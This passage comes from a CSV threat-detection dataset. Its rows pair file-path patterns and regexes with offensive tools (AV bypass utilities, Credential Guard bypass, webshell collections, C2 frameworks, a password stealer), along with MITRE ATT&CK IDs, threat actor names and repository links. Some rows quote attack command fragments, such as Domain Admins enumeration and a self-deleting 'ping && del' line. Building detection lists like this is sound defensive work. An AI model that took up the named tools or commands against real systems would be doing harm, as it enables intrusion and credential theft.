security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","5867" "*/Bypass/payloads*",".{0,1000}\/Bypass\/payloads.{0,1000}","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","N/A","10","1127","202","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z","5868" "*/bypass_mod/loader*",".{0,1000}\/bypass_mod\/loader.{0,1000}","offensive_tool_keyword","C2 related tools","An anti-virus platform written in the Golang-Gin framework with built-in BypassAV methods such as separation and bundling.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 
- T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Ed1s0nZ/cool","1","1","N/A","N/A","10","10","686","112","2023-07-13T07:04:30Z","2021-11-10T14:32:34Z","5869" "*/BypassAddUser.exe*",".{0,1000}\/BypassAddUser\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","5870" "*/BypassAddUser.exe*",".{0,1000}\/BypassAddUser\.exe.{0,1000}","offensive_tool_keyword","BypassAddUser","Bypass antivirus software to add users","T1562.001 - T1078.002 - T1136.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TryA9ain/BypassAddUser","1","1","N/A","N/A","6","1","46","8","2020-12-12T05:11:35Z","2020-12-12T04:15:06Z","5871" "*/BypassAddUser.git*",".{0,1000}\/BypassAddUser\.git.{0,1000}","offensive_tool_keyword","BypassAddUser","Bypass antivirus software to add users","T1562.001 - T1078.002 - T1136.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TryA9ain/BypassAddUser","1","1","N/A","N/A","6","1","46","8","2020-12-12T05:11:35Z","2020-12-12T04:15:06Z","5872" "*/BypassAddUser/releases/download/*",".{0,1000}\/BypassAddUser\/releases\/download\/.{0,1000}","offensive_tool_keyword","BypassAddUser","Bypass antivirus software to add users","T1562.001 - T1078.002 - T1136.001","TA0005 - TA0003","N/A","N/A","Defense 
Evasion","https://github.com/TryA9ain/BypassAddUser","1","1","N/A","N/A","6","1","46","8","2020-12-12T05:11:35Z","2020-12-12T04:15:06Z","5873" "*/BypassAddUser/tarball/*",".{0,1000}\/BypassAddUser\/tarball\/.{0,1000}","offensive_tool_keyword","BypassAddUser","Bypass antivirus software to add users","T1562.001 - T1078.002 - T1136.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TryA9ain/BypassAddUser","1","1","N/A","N/A","6","1","46","8","2020-12-12T05:11:35Z","2020-12-12T04:15:06Z","5874" "*/BypassAddUser/zipball/*",".{0,1000}\/BypassAddUser\/zipball\/.{0,1000}","offensive_tool_keyword","BypassAddUser","Bypass antivirus software to add users","T1562.001 - T1078.002 - T1136.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TryA9ain/BypassAddUser","1","1","N/A","N/A","6","1","46","8","2020-12-12T05:11:35Z","2020-12-12T04:15:06Z","5875" "*/BypassAV/*",".{0,1000}\/BypassAV\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike plugin for quickly generating anti-kill executable files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker 
- DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/hack2fun/BypassAV","1","1","N/A","N/A","10","10","908","125","2020-07-19T15:46:54Z","2020-02-17T02:33:14Z","5876" "*/bypassAV-1/*",".{0,1000}\/bypassAV\-1\/.{0,1000}","offensive_tool_keyword","cobaltstrike","bypassAV cobaltstrike shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - 
XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/jas502n/bypassAV-1","1","1","N/A","N/A","10","10","17","9","2021-03-04T01:51:14Z","2021-03-03T11:33:38Z","5877" "*/bypass-clm.exe*",".{0,1000}\/bypass\-clm\.exe.{0,1000}","offensive_tool_keyword","bypass-clm","PowerShell Constrained Language Mode Bypass","T1059.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/calebstewart/bypass-clm","1","1","N/A","N/A","8","3","261","38","2021-01-31T19:13:55Z","2021-01-29T04:46:23Z","5878" "*/bypass-clm.git*",".{0,1000}\/bypass\-clm\.git.{0,1000}","offensive_tool_keyword","bypass-clm","PowerShell Constrained Language Mode Bypass","T1059.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/calebstewart/bypass-clm","1","1","N/A","N/A","8","3","261","38","2021-01-31T19:13:55Z","2021-01-29T04:46:23Z","5879" "*/BypassCredGuard.cpp*",".{0,1000}\/BypassCredGuard\.cpp.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","1","N/A","N/A","10","4","323","52","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z","5880" "*/BypassCredGuard.exe*",".{0,1000}\/BypassCredGuard\.exe.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","1","N/A","N/A","10","4","323","52","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z","5881" "*/BypassCredGuard.git*",".{0,1000}\/BypassCredGuard\.git.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential 
Access","https://github.com/wh0amitz/BypassCredGuard","1","1","N/A","N/A","10","4","323","52","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z","5882" "*/BypassFramework.py*",".{0,1000}\/BypassFramework\.py.{0,1000}","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","1","N/A","N/A","10","8","758","152","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z","5883" "*/bypass-iisuser-p.asp*",".{0,1000}\/bypass\-iisuser\-p\.asp.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","5884" "*/bypassuac/*",".{0,1000}\/bypassuac\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","5885" "*/bypass-waf.asp*",".{0,1000}\/bypass\-waf\.asp.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","5886" "*/bypass-with-base32.php*",".{0,1000}\/bypass\-with\-base32\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","5887" "*/c lol fuck this*",".{0,1000}\/c\slol\sfuck\sthis.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","N/A","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","5888" "*/c net group *Domain Admins* /domain >> output.txt*",".{0,1000}\/c\snet\sgroup\s.{0,1000}Domain\sAdmins.{0,1000}\s\/domain\s\>\>\soutput\.txt.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and 
testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","5889" "*/c ping 127.0.0.1 && del \\*",".{0,1000}\/c\sping\s127\.0\.0\.1\s\&\&\sdel\s\\\\.{0,1000}","offensive_tool_keyword","PredatorTheStealer","C++ stealer (passwords - cookies - forms - cards - wallets) ","T1078 - T1114 - T1555 - T1539 - T1212 - T1132","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/SecUser1/PredatorTheStealer","1","0","N/A","N/A","8","1","11","2","2022-12-06T16:46:33Z","2022-12-06T16:34:43Z","5890" "*/C2/Beacon/*.cs*",".{0,1000}\/C2\/Beacon\/.{0,1000}\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","5891" "*/c2/c2.go*",".{0,1000}\/c2\/c2\.go.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","1","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","5892" "*/C2/c2.go*",".{0,1000}\/C2\/c2\.go.{0,1000}","offensive_tool_keyword","GC2-sheet","GC2 is a Command and Control 
application that allows an attacker to execute commands on the target machine using Google Sheet and exfiltrate data using Google Drive.","T1071.002 - T1560 - T1105","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/looCiprian/GC2-sheet","1","1","N/A","N/A","10","10","578","111","2025-03-28T19:48:36Z","2021-09-15T19:06:12Z","5893" "*/C2/Http/*.cs*",".{0,1000}\/C2\/Http\/.{0,1000}\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","5894" "*/C2/server.py*",".{0,1000}\/C2\/server\.py.{0,1000}","offensive_tool_keyword","primusC2","another C2 framework","T1090 - T1071","TA0011 - TA0002","N/A","N/A","C2","https://github.com/Primusinterp/PrimusC2","1","1","N/A","N/A","10","10","55","4","2024-11-01T00:20:02Z","2023-04-19T10:59:30Z","5895" "*/C2/SmbListener.*",".{0,1000}\/C2\/SmbListener\..{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","5896" "*/c2/tcp-stager.*",".{0,1000}\/c2\/tcp\-stager\..{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY 
BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","5897" "*/c2_access.log*",".{0,1000}\/c2_access\.log.{0,1000}","offensive_tool_keyword","pac2","PAC2 is a framework that generates arbitrary flows and sends and executes them on the Power Automate Platform - using Power automate as a C2","T1550.001 - T1204.002 - T1102 - T1071.001","TA0005 - TA0008 - TA0010- TA0011","N/A","N/A","C2","https://github.com/NTT-Security-Japan/pac2","1","0","#linux","N/A","6","10","6","1","2024-04-16T11:58:54Z","2024-03-01T08:06:32Z","5898" "*/c2_code/*.html",".{0,1000}\/c2_code\/.{0,1000}\.html","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","5899" "*/c2_code/server*",".{0,1000}\/c2_code\/server.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","5900" "*/C2_Profiles/*",".{0,1000}\/C2_Profiles\/.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","5901" "*/C2_Server.git*",".{0,1000}\/C2_Server\.git.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","1","N/A","N/A","10","10","54","18","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z","5902" "*/c2_server.py*",".{0,1000}\/c2_server\.py.{0,1000}","offensive_tool_keyword","Commander","A command and control (C2) server","T1021 - T1027 - T1059","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/voukatas/Commander","1","1","N/A","N/A","10","10","56","16","2024-07-05T11:05:30Z","2023-02-03T16:46:33Z","5903" "*/c2_server/resources*",".{0,1000}\/c2_server\/resources.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","5904" "*/c2_test.go*",".{0,1000}\/c2_test\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black 
Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","5905" "*/c2-3.4.0.zip*",".{0,1000}\/c2\-3\.4\.0\.zip.{0,1000}","offensive_tool_keyword","hak5 cloudc2","Cloud C2 makes it easy for pentesters and security teams to deploy and manage Hak5 gear from the cloud","T1021 - T1102 - T1213","TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://shop.hak5.org/products/c2?","1","1","N/A","N/A","10","9","N/A","N/A","N/A","N/A","5906" "*/c2-3.4.0_amd64_darwin*",".{0,1000}\/c2\-3\.4\.0_amd64_darwin.{0,1000}","offensive_tool_keyword","hak5 cloudc2","Cloud C2 makes it easy for pentesters and security teams to deploy and manage Hak5 gear from the cloud","T1021 - T1102 - T1213","TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://shop.hak5.org/products/c2?","1","0","#linux","N/A","10","9","N/A","N/A","N/A","N/A","5907" "*/c2-3.4.0_amd64_windows.exe*",".{0,1000}\/c2\-3\.4\.0_amd64_windows\.exe.{0,1000}","offensive_tool_keyword","hak5 cloudc2","Cloud C2 makes it easy for pentesters and security teams to deploy and manage Hak5 gear from the cloud","T1021 - T1102 - T1213","TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://shop.hak5.org/products/c2?","1","1","N/A","N/A","10","9","N/A","N/A","N/A","N/A","5908" "*/c2-3.4.0_arm64_darwin*",".{0,1000}\/c2\-3\.4\.0_arm64_darwin.{0,1000}","offensive_tool_keyword","hak5 cloudc2","Cloud C2 makes it easy for pentesters and security teams to deploy and manage Hak5 gear from the cloud","T1021 - T1102 - T1213","TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://shop.hak5.org/products/c2?","1","1","#linux","N/A","10","9","N/A","N/A","N/A","N/A","5909" "*/c2-3.4.0_i386_windows.exe*",".{0,1000}\/c2\-3\.4\.0_i386_windows\.exe.{0,1000}","offensive_tool_keyword","hak5 cloudc2","Cloud C2 makes it easy for pentesters and security teams to deploy and manage Hak5 gear from the cloud","T1021 - T1102 - 
T1213","TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://shop.hak5.org/products/c2?","1","1","N/A","N/A","10","9","N/A","N/A","N/A","N/A","5910" "*/c2-3.4.0_i386_windows.exe*",".{0,1000}\/c2\-3\.4\.0_i386_windows\.exe.{0,1000}","offensive_tool_keyword","hak5 cloudc2","Cloud C2 makes it easy for pentesters and security teams to deploy and manage Hak5 gear from the cloud","T1021 - T1102 - T1213","TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://shop.hak5.org/products/c2?","1","1","N/A","N/A","10","9","N/A","N/A","N/A","N/A","5911" "*/C2concealer*",".{0,1000}\/C2concealer.{0,1000}","offensive_tool_keyword","C2concealer","C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/C2concealer","1","1","N/A","N/A","10","10","1053","172","2024-06-25T11:10:54Z","2020-03-23T14:13:16Z","5912" "*/C2concealer*",".{0,1000}\/C2concealer.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","5913" "*/c2endpoint.php*",".{0,1000}\/c2endpoint\.php.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","5914" "*/C2Frame.*",".{0,1000}\/C2Frame\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","5915" "*/C2Manager.cs*",".{0,1000}\/C2Manager\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - 
